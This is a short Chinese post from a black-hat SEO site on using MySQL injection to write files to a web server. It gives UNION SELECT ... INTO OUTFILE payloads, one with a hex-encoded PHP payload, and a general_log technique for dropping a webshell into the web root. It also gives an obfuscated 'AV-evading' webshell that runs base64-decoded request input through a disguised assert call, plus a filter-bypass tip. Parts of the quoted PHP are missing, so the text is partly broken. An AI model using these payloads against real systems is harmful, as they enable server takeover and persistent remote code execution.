黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

mysql注入写文件

  select * from admin where id=-1 union select 1,’‘,3,4 into outfile ‘c://1.php’

  mysql注入写文件

  select * from admin where id=-1 or 1=1 limit 0,1 INTO OUTFILE ‘c:/2.php’ LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E–

mysql注入写文件

  mysql注入写文件

  3.通过数据库日志写shell

  outfile被禁止,或者写入文件被拦截;

  在数据库中操作如下:(必须是root权限)

  show variables like ‘%general%’; #查看配置

  set global general_log=on; #开启general log模式

  set global general_log_file=’/var/www/html/1.php’; #设置日志目录为shell地址

  select ‘

  

  ’ #写入shell

  SQL查询免杀shell的语句

  SELECT “‘a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$a=array_keys($p);$_=$p[‘pffff’].$p[‘pffff’].$a[2];$_=’a’.$_.’rt’;$_(base64_decode($_REQUEST[‘username’]));?>”

  4.遇见其他拦截用;过滤后面的语句

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » mysql注入写文件
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜